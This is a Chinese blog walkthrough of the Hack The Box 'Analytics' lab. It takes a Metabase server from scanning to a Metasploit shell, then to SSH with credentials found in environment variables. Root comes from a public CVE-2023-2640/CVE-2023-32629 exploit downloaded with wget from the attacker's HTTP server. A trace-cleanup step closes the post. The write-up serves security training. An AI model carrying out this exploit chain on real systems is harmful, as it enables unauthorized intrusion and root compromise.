首页 > 其他分享 >【HTB】 Analytics 红队 easy

【HTB】 Analytics 红队 easy

时间:2023-12-09 10:56:53浏览次数:33  
标签:txt HTB Analytics 2023 analytical 10.10 红队 CVE htb

1、扫描端口、服务

nmap 10.10.11.233 -sCV

2、检查网页

1)访问 10.10.11.233,失败,出现一个域名

添加进 hosts

echo '10.10.11.233 analytical.htb' >> /etc/hosts

再次访问,这下就能成功访问

2)检查页面信息

有个 login

点击 login 会跳转至 http://data.analytical.htb/auth/login?redirect=%2F,明显是个子域名,如果无法进入,将子域名添加进 hosts

echo '10.10.11.233 analytical.htb data.analytical.htb' >> /etc/hosts

3)登录页面

以邮箱为账号,之前页面上面有两个邮箱:[email protected][email protected],也许可以爆破

Metabase 开源的数据分析工具

3、获取 user.txt

1)查找对应漏洞

msfconsole
search metabase
use 0

由于该漏洞较新,需要更新 msf

exit	# 退出 msf
apt update
apt install metasploit-framework

2)设置参数

options
set rhosts data.analytical.htb
set rport 80
set lhost 10.10.16.30

3)执行,跟下列图片一样则为成功

4)输入 id 验证

5)执行 env,获取了一组账号密码

6)ssh 连接

ssh [email protected]

7)获取 user.txt

cat user.txt

4、获取 root.txt

1)查看系统信息

2)查找下载对应漏洞(CVE-2023-2640、CVE-2023-32629)
注意是在 kali 里面下载

git clone https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.git
cd CVE-2023-2640-CVE-2023-32629/
ls 

3)开启 http 服务

python3 -m http.server 80

4)将 exploit 发送至目标主机

cd /tmp		# 进入 /tmp 是为了不让别人轻易使用你找的 exploit
wget 10.10.16.30/exploit.sh
ls

5)添加权限,执行

6)验证

7)获取 root.txt

cat /root/root.txt

8)清扫痕迹

清扫痕迹的目的是为了不然别人轻易获得 root.txt

标签:txt,HTB,Analytics,2023,analytical,10.10,红队,CVE,htb
From: https://www.cnblogs.com/IFS-/p/17890613.html

相关文章

  • 【HTB】 Devvortex 红队 easy
    1、端口扫描2、网页检测发现一个表单,查看源代码发现是假表单可能发现一个自定义域名3、子域名扫描gobusterdir-w/usr/share/dirb/wordlists/common.txt-uhttp://dev.devvortex.htb/--no-error4、目录扫描没啥收获5、页面登录1)访问http://dev.devvortex.htb......
  • 红队开发学习----魔改cobaltstrike学习(持续更新)
    目录环境和工具准备反编译CobaltStrike_4.4_000.jarIdea项目HelloWorld测试代码去除凭证读取teamserver端配置修改端口证书profile配置JA3|JA3S/JARM指纹修改源码层面修改stager导致配置泄漏修改xor密钥(未进行,没研究明白,怕改崩了)修改stager下载路径的长度修复一个漏洞参考文......
  • 《Visual Analytics for RNN-Based Deep Reinforcement Learning》
    摘要准备开题报告,整理一篇2022年TOP论文。论文介绍该论文是一篇2022年,有关可视化分析基于RNN的深度强化学习训练过程的文章。一作是JunpengWang,作者主要研究领域就是:visualization,visualanalytics,explainableAI。作者主页:https://junpengw.github.io/#/主要工......
  • HTB Pilgrimage
     nmap扫一下发现80和22端口开放。 改hosts文件访问域名pilgrimage.htb 直接就是一个文件上传,尝试有没有文件上传漏洞。发现无论任何类型的文件,会将所有文件重命名并加上png或jpg后缀,但从从文件上传这个点突破是有点困难的。尝试其他的方法,扫一下这个网站,看看有没有敏感......
  • HTB Codify
     第一步,和上次一样,改hosts文件,域名对应ip。信息收集nmap扫一下:└─$nmap-sV10.10.11.239StartingNmap7.93(https://nmap.org)at2023-11-1715:58HKTNmapscanreportforcodify.htb(10.10.11.239)Hostisup(0.31slatency).Notshown:983closedtcppo......
  • 整理《DQNViz: A Visual Analytics Approach to Understand Deep Q-Networks》
    DQNViz:AVisualAnalyticsApproachtoUnderstandDeepQ-Networks论文/强化学习可视化摘要打算研究深度强化学习方向,整理最近的一篇2019年的论文,作为总结思考!论文介绍该论文是一篇2019年,有关基于可视化进行强化学习可解释的文章。一作是JunpengWang,作者主要研究领......
  • google analytics , looker , bigquery的区别
    GoogleAnalytics、Looker和BigQuery是Google提供的三种不同的数据服务,它们各自有不同的用途和功能。GoogleAnalytics:主要用途:GoogleAnalytics是一种网站和应用程序分析服务,它能帮助您理解用户如何与您的网站或应用互动。它收集关于页面浏览量、用户会话、用户行为......
  • htb-Web Requests
    HTTP1)Togettheflag,starttheaboveexercise,thenusecURLtodownloadthefilereturnedby'/download.php'intheservershownabove.curlIP/download.phpHTTPRequestsandResponses1)WhatistheHTTPmethodusedwhileinterceptingthe......
  • 如何使用 Google Analytics 白嫖做应用埋点
    GoogleAnalytics很多时候用于做网站的数据分析,直接在网站中嵌入代码就可以。如果是Chrome插件或者其它应用,可以使用MeasurementProtocolAPI来上报埋点。API官方文档:MeasurementProtocol(GoogleAnalytics(分析)4) | 适用于GoogleAnalytics(分析)4的MeasurementProt......
  • htb-cozyhosting
    HTB-CozyHostinghttps://app.hackthebox.com/machines/CozyHosting──(kwkl㉿kwkl)-[~]└─$tail-l/etc/hosts1......